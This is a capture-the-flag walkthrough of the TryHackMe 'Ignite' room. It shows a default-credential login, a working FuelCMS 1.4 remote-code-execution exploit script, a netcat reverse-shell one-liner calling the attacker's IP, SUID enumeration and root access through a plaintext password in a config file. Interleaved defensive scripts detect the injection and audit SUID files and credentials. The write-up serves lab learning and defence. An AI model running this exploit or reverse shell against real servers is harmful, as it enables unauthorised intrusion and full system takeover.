Try Hack Me — Ignite

Pranav Joglekar
5 min read · Nov 6, 2020

Description:
A new start-up has a few issues with their web server.

Let’s deploy the machine and connect to the TryHackMe VPN while the IP loads. Once we get the IP (10.10.131.58, in my case), navigate to it to browse through the website.

Meanwhile run nmap to check for open ports:

nmap -sC -sS -p 0-1000 10.10.131.58

While nmap is running, let’s have a look at the website.

The website contains steps to configure a CMS — FuelCMS. It also contains the link to a login page for FuelCMS.

Let’s run ffuf on / and /fuel to brute-force for subdirectories. (Spoiler — you won’t find anything interesting.)

In the meantime, let’s check the output of nmap to check if we have anything interesting.

Unfortunately nothing juicy here. We observe that only port 80 is open. The silver lining is that we can now be sure the flaws are on the webserver and not on any other service. (I know the description says so, but better to be sure.)

While ffuf runs, let’s search for well-known exploits on FuelCMS that we may be able to use.

Before that, let’s just try username:admin & password:admin on the /fuel/ login page. I know it doesn’t work……

Wait it did. We are in. Yeahhhhhhh.

In any case, let’s just have a look at the vulnerabilities. We may need them later.

A simple google search leads us to -

Yesss. An RCE. I think that should be enough for now. Wait — this works on FuelCMS version 1.4. Let’s just confirm our version again. Thankfully it’s 1.4 too. Yup. This exploit should work.

Let’s dig deeper into this exploit later. First, let us observe the admin panel.

Let’s check whether we can add and access malicious PHP files somewhere; if we can, getting a shell is easy. Unfortunately, I tried “Pages”, “Blocks” and “Assets” and observed that we aren’t able to add .php (or other extensions). Feel free to try other approaches and reach out to me if you find something.

Okay, so the admin panel wasn’t able to provide us with anything easy. Yes, we know that we can upload PDFs and images to the assets folder, which could be exploited if certain PHP functions are called on the files, but we aren’t sure these functions are called. So, for now let’s pause here with the admin panel and try the RCE exploit we found.

The RCE exploit (https://www.exploit-db.com/exploits/47138) is a kind of sql-injection vulnerability and allows code execution without any prerequisites. Seems easy, let’s try that.

The first step is to download the exploit. We observe it’s a Python file. We then modify the script a little to suit our requirements — we change the url to the IP of the machine (or the corresponding FuelCMS homepage URL), and since we don’t require a proxy, we remove the part using the proxy. The modified file is:-

import requests
import urllib.parse  # the original exploit is Python 2 (urllib.quote); ported here to Python 3

#url = "http://127.0.0.1:8881"
url = "http://10.10.68.231"  # target FuelCMS host


def find_nth_overlapping(haystack, needle, n):
    # Return the index of the n-th occurrence of needle in haystack (overlapping matches allowed)
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start + 1)
        n -= 1
    return start


while 1:
    xxxx = input('cmd:')  # raw_input() in the Python 2 original
    # The command is URL-encoded and placed inside the injected 'filter' parameter
    burp0_url = url + "/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27" + urllib.parse.quote(xxxx) + "%27%29%2b%27"
    #proxy = {"http":"http://127.0.0.1:8080"}  # proxy removed, not needed here
    r = requests.get(burp0_url)
    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)
    begin = r.text[0:20]
    # The response repeats its opening; everything before the repeat is the command output
    dup = find_nth_overlapping(r.text, begin, 2)
    print(r.text[0:dup])

The next step is to run the file — python file_name.py

This provides us with a cmd prompt. Let’s test if it works.

cmd> ls

We observe a lot of gibberish and errors. Maybe it didn’t work. But wait, we observe something which looks like a list of files at the top. Let’s confirm this.

cmd> ls /home

And we see www-data. Yes. It worked, we have command execution abilities on the machine. Yesss. Let’s check if we are able to get the user flag.

cmd> cat /home/www-data/flag.txt

And there you have it. The user flag. Step 1 completed, way to go. Paste the flag in THM. Celebrate a bit before we move on to the next task.
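Seen from the defending side, the request the modified script sends is easy to spot: every command goes through the /fuel/pages/select/ endpoint with a filter parameter that decodes to PHP call syntax. The following detection script is an added example, not part of the original write-up or of the exploit; it parses constructed Apache-style access log lines, decodes the filter parameter and flags values that contain code rather than a page name.

```python
"""Flag abuse of the FuelCMS 'filter' parameter in web server access logs.

Added example, not from the original write-up. The suspicious request below is
a constructed log line carrying the same encoded payload the exploit script
sends; the IPs, timestamps and the benign requests are made up as well.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines in Apache combined format.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Nov/2020:10:00:01 +0000] "GET /fuel/pages/select/?filter=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Nov/2020:10:00:07 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%27%29%2b%27 HTTP/1.1" 200 4096 "-" "python-requests/2.24.0"
10.0.0.5 - - [06/Nov/2020:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# A legitimate filter is a page name. Code injection shows up as a quote
# followed by '+' and a function call, a variable called as a function
# ($a(...)), or the name of a PHP command-execution function.
SUSPICIOUS_RE = re.compile(
    r"'\s*\+\s*\w+\s*\(|\$\w+\s*\(|\b(?:system|passthru|shell_exec|exec|popen)\b",
    re.IGNORECASE,
)


def decode_filter(path):
    """Return the URL-decoded values of the 'filter' query parameter."""
    query = urlsplit(path).query
    return parse_qs(query).get("filter", [])  # parse_qs already percent-decodes


def scan_line(line):
    """Return a finding dict for a suspicious FuelCMS request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    if not path.startswith("/fuel/pages/select"):
        return None
    for value in decode_filter(path):
        if SUSPICIOUS_RE.search(value):
            return {
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": m.group("status"),
                "filter": value,
            }
    return None


def scan_log(text):
    """Scan a whole log and return the list of findings."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"[ALERT] {hit['ts']} {hit['ip']} status={hit['status']} filter={hit['filter']!r}")
```

Running it on the constructed log reports the single python-requests line, with the decoded filter value showing the injected call. The same rule translates directly into a WAF or log-monitoring signature: alert on a filter value for this endpoint that contains anything other than page-name characters.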

Yes, we have RCE abilities, but it’s tiring, time-consuming and inconsistent to use this method to run commands; it would be great if we had proper shell access. Let’s do that first (thanks to netcat).

On your work machine, start a netcat listener nc -lvnp <port>

I prefer the port 1234, so

nc -lvnp 1234

Then run the following command on the target machine(using the python script)

cmd> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.1.103 1234 >/tmp/f

If everything is successful, we should have a shell session in the netcat listener on the host machine. Yeahhh

Now we need to escalate our privileges to root.

Let’s search for all files with the SUID bit set:

find / -user root -perm -4000 2>/dev/null

We see that crontab is SUID enabled. I tried to exploit it but was unsuccessful. I couldn’t find anything which may give us sudo privileges. Seems we are stuck.
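The find command above is also the defender’s tool: the set of SUID-root binaries on a server should be small and should not change without a package upgrade. The script below is an added example, not from the original write-up. It compares a listing in the format that find prints against a baseline recorded when the host was built, so that a newly appeared SUID binary stands out; both listings here are constructed samples, and the live collector is included so the same comparison can be run against a real filesystem.

```python
"""Compare the SUID-root files on a host against a recorded baseline.

Added example, not from the original write-up. BASELINE and CURRENT are
constructed listings; the extra entry in CURRENT is invented to show what a
report looks like when something has changed.
"""
import os
import stat

# Constructed baseline: SUID-root files recorded when the server was provisioned.
BASELINE = """\
/bin/mount
/bin/su
/bin/umount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/crontab
"""

# Constructed current listing, as 'find / -user root -perm -4000 2>/dev/null' would print it.
CURRENT = """\
/bin/mount
/bin/su
/bin/umount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/crontab
/usr/local/bin/backup_helper
"""


def parse_listing(text):
    """One absolute path per line; blank lines and '#' comments are ignored."""
    paths = set()
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            paths.add(line)
    return paths


def collect_suid_root(root="/"):
    """Live equivalent of the find command: regular files owned by uid 0 with the SUID bit."""
    found = set()
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished entry, same as 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                found.add(path)
    return found


def diff_suid(baseline_text, current_text):
    """Return added, removed and unchanged SUID-root paths relative to the baseline."""
    baseline = parse_listing(baseline_text)
    current = parse_listing(current_text)
    return {
        "added": sorted(current - baseline),      # new SUID-root files: investigate
        "removed": sorted(baseline - current),    # expected files gone: also worth a look
        "unchanged": sorted(baseline & current),
    }


def format_report(result):
    """Render the diff as text, one '+'/'-' line per change."""
    lines = [f"+ {p}" for p in result["added"]] + [f"- {p}" for p in result["removed"]]
    if not lines:
        return "no change against baseline"
    return "\n".join(lines)


if __name__ == "__main__":
    # Offline demonstration on the constructed listings; replace CURRENT with
    # "\n".join(sorted(collect_suid_root())) to check a live host.
    print(format_report(diff_suid(BASELINE, CURRENT)))
```

On the constructed input the report is a single line, `+ /usr/local/bin/backup_helper`, which is exactly the kind of entry that deserves a look. Saving the baseline outside the host (it is no use if the attacker can edit it) and running the comparison from cron or a file-integrity monitor turns this one-off enumeration into a detection.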

I cheated a little and referred to another walkthrough, and got to know that the root password is stored in one of the FuelCMS configuration files. Let’s try to find the file.

After browsing a little, we find database.php in fuel/applications/config.

This file contains the root password.

We switch to root using su root and then cat the root flag to solve the room.
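The final step shows two mistakes at once: a database config readable by the web server user held a plaintext credential, and that credential doubled as the OS root password. A small audit for the first problem, and for the related habit of connecting to the database as root, is given below as an added example that is not part of the original write-up. The config text it checks is a constructed sample in the CodeIgniter style that FuelCMS builds on, with a placeholder password rather than the room’s real value.

```python
"""Audit a PHP config file for plaintext credentials and loose permissions.

Added example, not from the original write-up. SAMPLE_DATABASE_PHP is a
constructed CodeIgniter-style config; the password is a placeholder.
"""
import os
import re
import stat
import tempfile

# Constructed sample resembling a CodeIgniter database.php; values are placeholders.
SAMPLE_DATABASE_PHP = """<?php
$active_group = 'default';
$db['default']['hostname'] = 'localhost';
$db['default']['username'] = 'root';
$db['default']['password'] = 'PLACEHOLDER_PASSWORD';
$db['default']['database'] = 'fuel_schema';
"""

# Matches both  $db['x']['password'] = '...';  and  'password' => '...'
SECRET_RE = re.compile(
    r"""['"](?P<key>password|passwd|secret|api_key)['"]\s*(?:\]\s*=|=>)\s*['"](?P<value>[^'"]*)['"]""",
    re.IGNORECASE,
)
USERNAME_RE = re.compile(
    r"""['"]username['"]\s*(?:\]\s*=|=>)\s*['"](?P<value>[^'"]*)['"]""",
    re.IGNORECASE,
)


def mask(value):
    """Keep the first two characters so a report is recognisable without leaking the secret."""
    return value[:2] + "*" * (len(value) - 2) if value else "(empty)"


def find_secrets(text):
    """Return (key, value) pairs for credential-like assignments in the config text."""
    return [(m.group("key").lower(), m.group("value")) for m in SECRET_RE.finditer(text)]


def audit_config(path):
    """Check file mode and contents; return masked secrets plus a list of findings."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    secrets = find_secrets(text)
    findings = []
    if secrets and mode & stat.S_IROTH:
        findings.append("world-readable file contains credentials")
    elif secrets and mode & stat.S_IRGRP:
        findings.append("group-readable file contains credentials")
    for key, value in secrets:
        if value in ("", "password", "admin", "root"):  # constructed list of weak defaults
            findings.append(f"{key} is empty or a common default")
    for m in USERNAME_RE.finditer(text):
        if m.group("value") == "root":
            findings.append("database user is root: use a dedicated low-privilege "
                            "account and never share the OS root password with it")
    return {"mode": oct(mode), "secrets": [(k, mask(v)) for k, v in secrets], "findings": findings}


def write_sample(mode):
    """Write the constructed config to a temp file with the given mode and return its path."""
    with tempfile.NamedTemporaryFile("w", suffix=".php", delete=False) as f:
        f.write(SAMPLE_DATABASE_PHP)
        path = f.name
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    for m in (0o644, 0o600):
        report = audit_config(write_sample(m))
        print(report["mode"], report["secrets"])
        for finding in report["findings"]:
            print("  -", finding)
```

With mode 0644 the report flags the world-readable credential; with 0600 that finding disappears, but the root database user is still reported, because tightening the mode only helps against other local users, not against a web application that runs as the file’s owner and already has code execution. Point the audit at a real application/config directory by replacing write_sample with the actual path.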

Thank you,
